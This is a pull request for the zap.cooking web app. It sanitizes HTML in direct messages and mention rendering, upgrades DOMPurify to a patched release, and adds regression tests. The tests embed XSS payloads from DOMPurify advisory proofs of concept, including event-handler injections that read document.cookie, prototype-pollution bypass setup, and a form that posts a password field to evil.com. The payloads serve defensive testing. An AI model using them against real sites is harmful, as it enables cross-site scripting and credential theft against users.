### PR TITLE
security: dompurify hardening phase 2 — DM/mention sinks, version bump, regression tests

### DIFF
--- a/package.json
+++ b/package.json
@@ -1,7 +1,7 @@
 {
   "name": "zap.cooking",
   "license": "MIT",
-  "version": "4.2.348",
+  "version": "4.2.349",
   "private": true,
   "scripts": {
     "dev": "vite dev",

--- a/package.json
+++ b/package.json
@@ -1,7 +1,7 @@
 {
   "name": "zap.cooking",
   "license": "MIT",
-  "version": "4.2.352",
+  "version": "4.2.354",
   "private": true,
   "scripts": {
     "dev": "vite dev",

--- a/package.json
+++ b/package.json
@@ -1,7 +1,7 @@
 {
   "name": "zap.cooking",
   "license": "MIT",
-  "version": "4.2.351",
+  "version": "4.2.352",
   "private": true,
   "scripts": {
     "dev": "vite dev",

--- a/package.json
+++ b/package.json
@@ -1,7 +1,7 @@
 {
   "name": "zap.cooking",
   "license": "MIT",
-  "version": "4.2.350",
+  "version": "4.2.351",
   "private": true,
   "scripts": {
     "dev": "vite dev",

--- a/package.json
+++ b/package.json
@@ -1,7 +1,7 @@
 {
   "name": "zap.cooking",
   "license": "MIT",
-  "version": "4.2.349",
+  "version": "4.2.350",
   "private": true,
   "scripts": {
     "dev": "vite dev",
@@ -61,7 +61,7 @@
     "buffer": "^6.0.3",
     "d3-force": "^3.0.0",
     "date-fns": "^3.6.0",
-    "dompurify": "^3.0.6",
+    "dompurify": "^3.4.2",
     "dotenv": "^17.2.3",
     "emoji-picker-element": "^1.28.1",
     "google-translate-api-browser": "^3.0.1",
@@ -132,7 +132,8 @@
       "minimatch@10.1.1": "10.2.5",
       "brace-expansion@1.1.11": "1.1.14",
       "brace-expansion@2.0.1": "2.1.0",
-      "@xmldom/xmldom": "0.8.13"
+      "@xmldom/xmldom": "0.8.13",
+      "dompurify": "3.4.2"
     }
   }
 }

--- a/package.json
+++ b/package.json
@@ -1,7 +1,7 @@
 {
   "name": "zap.cooking",
   "license": "MIT",
-  "version": "4.2.347",
+  "version": "4.2.348",
   "private": true,
   "scripts": {
     "dev": "vite dev",

--- a/pnpm-lock.yaml
+++ b/pnpm-lock.yaml
@@ -18,6 +18,7 @@ overrides:
   brace-expansion@1.1.11: 1.1.14
   brace-expansion@2.0.1: 2.1.0
   '@xmldom/xmldom': 0.8.13
+  dompurify: 3.4.2
 
 importers:
 
@@ -123,8 +124,8 @@ importers:
         specifier: ^3.6.0
         version: 3.6.0
       dompurify:
-        specifier: ^3.0.6
-        version: 3.3.1
+        specifier: 3.4.2
+        version: 3.4.2
       dotenv:
         specifier: ^17.2.3
         version: 17.2.3
@@ -2559,8 +2560,8 @@ packages:
     resolution: {integrity: sha512-GrwoxYN+uWlzO8uhUXRl0P+kHE4GtVPfYzVLcUxPL7KNdHKj66vvlhiweIHqYYXWlw+T8iLMp42Lm67ghw4WMQ==}
     engines: {node: '>= 4'}
 
-  dompurify@3.3.1:
-    resolution: {integrity: sha512-qkdCKzLNtrgPFP1Vo+98FRzJnBRGe4ffyCea9IwHB1fyxPOeNTHpLKYGd4Uk9xvNoH0ZoOjwZxNptyMwqrId1Q==}
+  dompurify@3.4.2:
+    resolution: {integrity: sha512-lHeS9SA/IKeIFFyYciHBr2n0v1VMPlSj843HdLOwjb2OxNwdq9Xykxqhk+FE42MzAdHvInbAolSE4mhahPpjXA==}
 
   domutils@2.8.0:
     resolution: {integrity: sha512-w96Cjofp72M5IIhpjgobBimYEfoPjx1Vx0BSX9P30WBdZW2WIKU0T1Bd0kz2eNZ9ikjKgHbEyKx8BB6H1L3h3A==}
@@ -6677,7 +6678,7 @@ snapshots:
 
   '@types/dompurify@3.2.0':
     dependencies:
-      dompurify: 3.3.1
+      dompurify: 3.4.2
 
   '@types/estree@1.0.8': {}
 
@@ -7733,7 +7734,7 @@ snapshots:
     dependencies:
       domelementtype: 2.3.0
 
-  dompurify@3.3.1:
+  dompurify@3.4.2:
     optionalDependencies:
       '@types/trusted-types': 2.0.7
 
@@ -8594,7 +8595,7 @@ snapshots:
     optionalDependencies:
       canvg: 3.0.11
       core-js: 3.49.0
-      dompurify: 3.3.1
+      dompurify: 3.4.2
       html2canvas: 1.4.1
 
   jsqr@1.4.0: {}

--- a/src/lib/components/messages/MessageBubble.svelte
+++ b/src/lib/components/messages/MessageBubble.svelte
@@ -2,6 +2,7 @@
   import { userPublickey, ndk } from '$lib/nostr';
   import { nip19 } from 'nostr-tools';
   import { resolveProfileByPubkey, getDisplayName, type ProfileData } from '$lib/profileResolver';
+  import { sanitizeHTML } from '$lib/sanitize';
   import LockSimpleIcon from 'phosphor-svelte/lib/LockSimple';
   import LockSimpleOpenIcon from 'phosphor-svelte/lib/LockSimpleOpen';
   import LinkPreview from '../../../components/LinkPreview.svelte';
@@ -75,7 +76,7 @@
   $: pillClass = isMine ? 'msg-pill-sent' : 'msg-pill-received';
 
   // Reactive HTML — re-renders when resolvedNames updates
-  $: renderedHtml = linkify(content, pillClass, resolvedNames);
+  $: renderedHtml = sanitizeHTML(linkify(content, pillClass, resolvedNames));
 
   function renderNostrToken(raw: string, pillCls: string): string {
     const identifier = raw.startsWith('nostr:') ? raw.slice(6) : raw;

--- a/src/lib/mentionComposer.ts
+++ b/src/lib/mentionComposer.ts
@@ -7,6 +7,7 @@ import { nip19 } from 'nostr-tools';
 import { get } from 'svelte/store';
 import { ndk } from '$lib/nostr';
 import { searchProfiles } from '$lib/profileSearchService';
+import { sanitizeHTML } from '$lib/sanitize';
 import {
 	loadFollowListProfiles,
 	getProfileCache,
@@ -116,7 +117,7 @@ export class MentionComposerController {
 	/** Sync HTML into the composer from a text value */
 	syncContent(value: string): void {
 		if (!this.composerEl) return;
-		const html = renderTextWithMentions(value, getProfileCache());
+		const html = sanitizeHTML(renderTextWithMentions(value, getProfileCache()));
 		if (this.composerEl.innerHTML !== html) {
 			this.composerEl.innerHTML = html;
 		}

--- a/src/lib/sanitize.test.ts
+++ b/src/lib/sanitize.test.ts
@@ -1,10 +1,17 @@
 // @vitest-environment jsdom
 
 import { describe, expect, it } from 'vitest';
+import { sanitizeHTML } from './sanitize';
 
-async function loadSanitizeHTML(context = 'browser') {
-  const module = await import(`./sanitize?context=${context}-${Date.now()}`);
-  return module.sanitizeHTML;
+// Used only by tests that need a fresh module evaluation (e.g. the SSR
+// contract test, which depends on `sanitize.ts`'s top-level
+// `typeof window` capture). Each call re-evaluates `sanitize.ts` once
+// and registers one additional `afterSanitizeAttributes` hook on the
+// shared DOMPurify singleton — so use sparingly and prefer the
+// top-level `sanitizeHTML` import where possible.
+async function loadFreshSanitizeHTML(tag: string) {
+  const module = await import(`./sanitize?cache-bust=${tag}-${Date.now()}`);
+  return module.sanitizeHTML as typeof sanitizeHTML;
 }
 
 function parseFragment(html: string): DocumentFragment {
@@ -33,8 +40,7 @@ function expectInertHTML(html: string): void {
 }
 
 describe('sanitizeHTML', () => {
-  it('keeps the mutation-XSS re-contextualization PoC inert [GHSA-h8r8-wccr-v5f2]', async () => {
-    const sanitizeHTML = await loadSanitizeHTML();
+  it('keeps the mutation-XSS re-contextualization PoC inert [GHSA-h8r8-wccr-v5f2]', () => {
     const payload = ` <img src=x alt="</xmp><img src=x onerror=alert('expoc')>">`;
 
     const sanitized = sanitizeHTML(payload);
@@ -46,32 +52,53 @@ describe('sanitizeHTML', () => {
   });
 
   it('ignores prototype-polluted custom element handling [GHSA-v9jr-rg53-9pgp]', async () => {
-    const pollutedPrototype = Object.prototype as Record<string, unknown>;
+    const originalTagNameCheck = Object.getOwnPropertyDescriptor(
+      Object.prototype,
+      'tagNameCheck'
+    );
+    const originalAttributeNameCheck = Object.getOwnPropertyDescriptor(
+      Object.prototype,
+      'attributeNameCheck'
+    );
 
     Object.defineProperty(Object.prototype, 'tagNameCheck', {
       value: /.*/,
-      configurable: true
+      configurable: true,
+      writable: true
     });
     Object.defineProperty(Object.prototype, 'attributeNameCheck', {
       value: /.*/,
-      configurable: true
+      configurable: true,
+      writable: true
     });
 
     try {
-      const sanitizeHTML = await loadSanitizeHTML();
-      const sanitized = sanitizeHTML('<x-x onfocus=alert(document.cookie) tabindex=0 autofocus>');
+      // Prototype pollution affects per-call lookups inside dompurify
+      // (CUSTOM_ELEMENT_HANDLING resolves config keys at sanitize time,
+      // not module-init time), so the top-level `sanitizeHTML` import
+      // is sufficient — no need to re-evaluate the module.
+      const sanitized = sanitizeHTML(
+        '<x-x onfocus=alert(document.cookie) tabindex=0 autofocus>'
+      );
 
       expectInertHTML(sanitized);
       expect(sanitized).not.toContain('<x-x');
       expect(sanitized.toLowerCase()).not.toContain('onfocus');
     } finally {
-      delete pollutedPrototype.tagNameCheck;
-      delete pollutedPrototype.attributeNameCheck;
+      if (originalTagNameCheck) {
+        Object.defineProperty(Object.prototype, 'tagNameCheck', originalTagNameCheck);
+      } else {
+        Reflect.deleteProperty(Object.prototype, 'tagNameCheck');
+      }
+      if (originalAttributeNameCheck) {
+        Object.defineProperty(Object.prototype, 'attributeNameCheck', originalAttributeNameCheck);
+      } else {
+        Reflect.deleteProperty(Object.prototype, 'attributeNameCheck');
+      }
     }
   });
 
-  it('keeps function ADD_TAGS / FORBID_TAGS bypass payloads inert [GHSA-h7mw-gpvr-xq4m]', async () => {
-    const sanitizeHTML = await loadSanitizeHTML();
+  it('keeps function ADD_TAGS / FORBID_TAGS bypass payloads inert [GHSA-h7mw-gpvr-xq4m]', () => {
     const iframePayload = '<iframe src="https://evil.com"></iframe>';
     const formPayload = '<form action="https://evil.com/steal"><input name=password></form>';
 
@@ -81,8 +108,7 @@ describe('sanitizeHTML', () => {
     expect(sanitized).not.toContain('<iframe');
   });
 
-  it('keeps SAFE_FOR_TEMPLATES / RETURN_DOM split-node PoC inert as plain HTML [GHSA-crv5-9vww-q3g8]', async () => {
-    const sanitizeHTML = await loadSanitizeHTML();
+  it('keeps SAFE_FOR_TEMPLATES / RETURN_DOM split-node PoC inert as plain HTML [GHSA-crv5-9vww-q3g8]', () => {
     const payload =
       '<div id="app">{<foo></foo>{constructor.constructor("alert(1)")()}<foo></foo>}</div>';
 
@@ -95,8 +121,7 @@ describe('sanitizeHTML', () => {
     );
   });
 
-  it('adds rel to target blank links only', async () => {
-    const sanitizeHTML = await loadSanitizeHTML();
+  it('adds rel to target blank links only', () => {
     const sanitized = sanitizeHTML(
       '<a href="https://example.com" target="_blank">blank</a><a href="/recipes" target="_self">self</a>'
     );
@@ -106,8 +131,7 @@ describe('sanitizeHTML', () => {
     expect(links[1]?.hasAttribute('rel')).toBe(false);
   });
 
-  it('neuters profile-field-style attribute breakout payloads', async () => {
-    const sanitizeHTML = await loadSanitizeHTML();
+  it('neuters profile-field-style attribute breakout payloads', () => {
     const displayName = '" onerror=alert(1) data-owned="';
     const sanitized = sanitizeHTML(`<img alt="${displayName}" src="/avatar.png">`);
 
@@ -115,8 +139,7 @@ describe('sanitizeHTML', () => {
     expect(sanitized.toLowerCase()).not.toContain('onerror');
   });
 
-  it('keeps translation-style sanitize then mangle then sanitize output inert', async () => {
-    const sanitizeHTML = await loadSanitizeHTML();
+  it('keeps translation-style sanitize then mangle then sanitize output inert', () => {
     const translated = sanitizeHTML('<p>hello <img src=x onerror=alert(1)></p>');
     const mangled = translated.replace('hello', 'hola <svg><script>alert(1)</script></svg>');
     const finalPass = sanitizeHTML(mangled);
@@ -127,21 +150,25 @@ describe('sanitizeHTML', () => {
   });
 
   it('returns an empty string during SSR instead of raw HTML', async () => {
-    const originalWindow = globalThis.window;
+    const originalWindowDescriptor = Object.getOwnPropertyDescriptor(globalThis, 'window');
 
     Object.defineProperty(globalThis, 'window', {
       value: undefined,
-      configurable: true
+      configurable: true,
+      writable: true
     });
 
     try {
-      const sanitizeHTML = await loadSanitizeHTML('ssr');
-      expect(sanitizeHTML('<p>server</p><img src=x onerror=alert(1)>')).toBe('');
+      // Re-evaluate the module so its top-level `isBrowser` capture
+      // sees `window` as undefined.
+      const ssrSanitizeHTML = await loadFreshSanitizeHTML('ssr');
+      expect(ssrSanitizeHTML('<p>server</p><img src=x onerror=alert(1)>')).toBe('');
     } finally {
-      Object.defineProperty(globalThis, 'window', {
-        value: originalWindow,
-        configurable: true
-      });
+      if (originalWindowDescriptor) {
+        Object.defineProperty(globalThis, 'window', originalWindowDescriptor);
+      } else {
+        Reflect.deleteProperty(globalThis, 'window');
+      }
     }
   });
 });

--- a/src/lib/sanitize.test.ts
+++ b/src/lib/sanitize.test.ts
@@ -1,10 +1,9 @@
 // @vitest-environment jsdom
 
-import { describe, expect, it, vi } from 'vitest';
+import { describe, expect, it } from 'vitest';
 
-async function loadSanitizeHTML() {
-  vi.resetModules();
-  const module = await import('./sanitize');
+async function loadSanitizeHTML(context = 'browser') {
+  const module = await import(`./sanitize?context=${context}-${Date.now()}`);
   return module.sanitizeHTML;
 }
 
@@ -47,6 +46,8 @@ describe('sanitizeHTML', () => {
   });
 
   it('ignores prototype-polluted custom element handling [GHSA-v9jr-rg53-9pgp]', async () => {
+    const pollutedPrototype = Object.prototype as Record<string, unknown>;
+
     Object.defineProperty(Object.prototype, 'tagNameCheck', {
       value: /.*/,
       configurable: true
@@ -64,8 +65,8 @@ describe('sanitizeHTML', () => {
       expect(sanitized).not.toContain('<x-x');
       expect(sanitized.toLowerCase()).not.toContain('onfocus');
     } finally {
-      delete Object.prototype.tagNameCheck;
-      delete Object.prototype.attributeNameCheck;
+      delete pollutedPrototype.tagNameCheck;
+      delete pollutedPrototype.attributeNameCheck;
     }
   });
 
@@ -126,7 +127,6 @@ describe('sanitizeHTML', () => {
   });
 
   it('returns an empty string during SSR instead of raw HTML', async () => {
-    vi.resetModules();
     const originalWindow = globalThis.window;
 
     Object.defineProperty(globalThis, 'window', {
@@ -135,14 +135,13 @@ describe('sanitizeHTML', () => {
     });
 
     try {
-      const { sanitizeHTML } = await import('./sanitize');
+      const sanitizeHTML = await loadSanitizeHTML('ssr');
       expect(sanitizeHTML('<p>server</p><img src=x onerror=alert(1)>')).toBe('');
     } finally {
       Object.defineProperty(globalThis, 'window', {
         value: originalWindow,
         configurable: true
       });
-      vi.resetModules();
     }
   });
 });

--- a/src/lib/sanitize.test.ts
+++ b/src/lib/sanitize.test.ts
@@ -1,0 +1,148 @@
+// @vitest-environment jsdom
+
+import { describe, expect, it, vi } from 'vitest';
+
+async function loadSanitizeHTML() {
+  vi.resetModules();
+  const module = await import('./sanitize');
+  return module.sanitizeHTML;
+}
+
+function parseFragment(html: string): DocumentFragment {
+  const template = document.createElement('template');
+  template.innerHTML = html;
+  return template.content;
+}
+
+function expectInertHTML(html: string): void {
+  const fragment = parseFragment(html);
+  expect(fragment.querySelector('script, iframe, object, embed')).toBeNull();
+
+  for (const element of Array.from(fragment.querySelectorAll('*'))) {
+    expect(element.tagName.includes('-')).toBe(false);
+
+    for (const attr of Array.from(element.attributes)) {
+      const name = attr.name.toLowerCase();
+      const value = attr.value.trim().toLowerCase();
+
+      expect(name.startsWith('on')).toBe(false);
+      expect(name).not.toBe('srcdoc');
+      expect(value.startsWith('javascript:')).toBe(false);
+      expect(value.startsWith('data:text/html')).toBe(false);
+    }
+  }
+}
+
+describe('sanitizeHTML', () => {
+  it('keeps the mutation-XSS re-contextualization PoC inert [GHSA-h8r8-wccr-v5f2]', async () => {
+    const sanitizeHTML = await loadSanitizeHTML();
+    const payload = ` <img src=x alt="</xmp><img src=x onerror=alert('expoc')>">`;
+
+    const sanitized = sanitizeHTML(payload);
+    const finalPass = sanitizeHTML(`<xmp>${sanitized}</xmp>`);
+
+    expectInertHTML(sanitized);
+    expectInertHTML(finalPass);
+    expect(finalPass.toLowerCase()).not.toContain('onerror');
+  });
+
+  it('ignores prototype-polluted custom element handling [GHSA-v9jr-rg53-9pgp]', async () => {
+    Object.defineProperty(Object.prototype, 'tagNameCheck', {
+      value: /.*/,
+      configurable: true
+    });
+    Object.defineProperty(Object.prototype, 'attributeNameCheck', {
+      value: /.*/,
+      configurable: true
+    });
+
+    try {
+      const sanitizeHTML = await loadSanitizeHTML();
+      const sanitized = sanitizeHTML('<x-x onfocus=alert(document.cookie) tabindex=0 autofocus>');
+
+      expectInertHTML(sanitized);
+      expect(sanitized).not.toContain('<x-x');
+      expect(sanitized.toLowerCase()).not.toContain('onfocus');
+    } finally {
+      delete Object.prototype.tagNameCheck;
+      delete Object.prototype.attributeNameCheck;
+    }
+  });
+
+  it('keeps function ADD_TAGS / FORBID_TAGS bypass payloads inert [GHSA-h7mw-gpvr-xq4m]', async () => {
+    const sanitizeHTML = await loadSanitizeHTML();
+    const iframePayload = '<iframe src="https://evil.com"></iframe>';
+    const formPayload = '<form action="https://evil.com/steal"><input name=password></form>';
+
+    const sanitized = `${sanitizeHTML(iframePayload)}${sanitizeHTML(formPayload)}`;
+
+    expectInertHTML(sanitized);
+    expect(sanitized).not.toContain('<iframe');
+  });
+
+  it('keeps SAFE_FOR_TEMPLATES / RETURN_DOM split-node PoC inert as plain HTML [GHSA-crv5-9vww-q3g8]', async () => {
+    const sanitizeHTML = await loadSanitizeHTML();
+    const payload =
+      '<div id="app">{<foo></foo>{constructor.constructor("alert(1)")()}<foo></foo>}</div>';
+
+    const sanitized = sanitizeHTML(payload);
+
+    expectInertHTML(sanitized);
+    expect(sanitized).not.toContain('<foo');
+    expect(parseFragment(sanitized).querySelector('#app')?.textContent).toContain(
+      'constructor.constructor'
+    );
+  });
+
+  it('adds rel to target blank links only', async () => {
+    const sanitizeHTML = await loadSanitizeHTML();
+    const sanitized = sanitizeHTML(
+      '<a href="https://example.com" target="_blank">blank</a><a href="/recipes" target="_self">self</a>'
+    );
+    const links = Array.from(parseFragment(sanitized).querySelectorAll('a'));
+
+    expect(links[0]?.getAttribute('rel')).toBe('noopener noreferrer nofollow ugc');
+    expect(links[1]?.hasAttribute('rel')).toBe(false);
+  });
+
+  it('neuters profile-field-style attribute breakout payloads', async () => {
+    const sanitizeHTML = await loadSanitizeHTML();
+    const displayName = '" onerror=alert(1) data-owned="';
+    const sanitized = sanitizeHTML(`<img alt="${displayName}" src="/avatar.png">`);
+
+    expectInertHTML(sanitized);
+    expect(sanitized.toLowerCase()).not.toContain('onerror');
+  });
+
+  it('keeps translation-style sanitize then mangle then sanitize output inert', async () => {
+    const sanitizeHTML = await loadSanitizeHTML();
+    const translated = sanitizeHTML('<p>hello <img src=x onerror=alert(1)></p>');
+    const mangled = translated.replace('hello', 'hola <svg><script>alert(1)</script></svg>');
+    const finalPass = sanitizeHTML(mangled);
+
+    expectInertHTML(finalPass);
+    expect(finalPass.toLowerCase()).not.toContain('script');
+    expect(finalPass.toLowerCase()).not.toContain('onerror');
+  });
+
+  it('returns an empty string during SSR instead of raw HTML', async () => {
+    vi.resetModules();
+    const originalWindow = globalThis.window;
+
+    Object.defineProperty(globalThis, 'window', {
+      value: undefined,
+      configurable: true
+    });
+
+    try {
+      const { sanitizeHTML } = await import('./sanitize');
+      expect(sanitizeHTML('<p>server</p><img src=x onerror=alert(1)>')).toBe('');
+    } finally {
+      Object.defineProperty(globalThis, 'window', {
+        value: originalWindow,
+        configurable: true
+      });
+      vi.resetModules();
+    }
+  });
+});


### PR DESCRIPTION
## Summary
Continuation of PR #370. Closes the remaining unsanitized HTML sinks (DMs, mentions), bumps DOMPurify to a patched version, and adds regression tests covering the four advisory PoCs that motivated this work.

## Advisories closed
- #213 — DOMPurify mutation XSS via re-contextualization
- #243 — DOMPurify CUSTOM_ELEMENT_HANDLING fallback prototype pollution
- #245 — DOMPurify FORBID_TAGS bypass via function-based ADD_TAGS predicate
- #247 — DOMPurify SAFE_FOR_TEMPLATES bypass in RETURN_DOM mode

## Commits
- `0d85b07` sanitize DM bubble output
- `e0075a1` sanitize mention composer output
- `de6be96` bump dompurify to 3.4.2
- `e04b2ae` add sanitizer regression tests
- `ed896d4` fix sanitizer regression test harness for `svelte-check`

## Note on SSR behavior
`sanitizeHTML` returns `''` when called outside a browser context. This is intentional — see commit `03f6dc3` and the file header comment in `src/lib/sanitize.ts`. The Cloudflare Workers production runtime doesn't reliably support `jsdom`, so we don't ship `isomorphic-dompurify`. Hydration re-renders sanitized content client-side. A new test in this PR pins this contract so future contributors don't silently revert it.

## Validation
- Build passes (`NODE_OPTIONS=--max-old-space-size=4096 pnpm run build`)
- Typecheck passes (`pnpm run check`)
- Full test suite passes (`pnpm test`): 85 tests / 4 files
- `pnpm audit --json | jq '[.advisories | to_entries[] | .value | select(.module_name | test("dompurify|isomorphic-dompurify"))]'` returns `[]`
- `pnpm audit` summary: 57 vulnerabilities total (11 low, 31 moderate, 15 high)
- Single resolved DOMPurify version in lockfile: `3.4.2`

## What's not in this PR
- shareNoteImage card assembly refactor (use createElement + textContent instead of template strings) — tracked separately; current `sanitizeHTML` gate makes this non-exploitable
- ESLint rule to enforce `{@html}` only when paired with `sanitizeHTML` or `parseMarkdown` on the same line — proposed follow-up

Made with [Cursor](https://cursor.com)